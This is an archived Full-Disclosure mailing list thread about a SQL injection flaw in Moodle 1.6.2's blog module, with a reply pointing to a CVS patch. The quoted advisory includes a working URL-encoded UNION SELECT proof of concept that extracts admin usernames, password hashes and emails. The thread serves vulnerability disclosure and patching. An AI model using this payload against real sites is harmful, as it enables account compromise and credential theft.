Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: [Full-disclosure] SQL injection - moodle
From: "scsantos () unigranrio com br" <scsantos () unigranrio com br>
Date: Mon, 09 Oct 2006 07:47:18 -0300

A security vulnerability was recently discovered in all versions of
Moodle 1.6 and later that allows SQL injection. A quick one-line fix has
already been added to CVS to patch this problem for 1.6.x and 1.7 versions.

Update your servers using CVS as soon as possible, or edit the file
blog/index.php in your copy manually as described here:

    http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3

Att,

Silvio Cesar L. dos Santos
Analista de Redes Pleno
DTI - Divisão de Tecnologia da Informação
UNIGRANRIO - Universidade do Grande Rio
+55 21 2672-7720
silviocesar () unigranrio edu br
scsantos () unigranrio com br
http://www.unigranrio.br


disfigure wrote:
/****************************************/
http://www.w4cking.com

Product:
moodle 1.6.2
http://www.moodle.org

Vulnerability:
SQL injection

Notes:
- SQL injection can be used to obtain password hash
- the moodle blog "module" must be enabled
- guest access to the blog must be enabled

POC:
<target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271


Original advisory (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1305
/****************************************/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



  By Date           By Thread  

Current thread:
  • SQL injection - moodle disfigure (Oct 09)
    • Re: [Full-disclosure] SQL injection - moodle scsantos () unigranrio com br (Oct 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault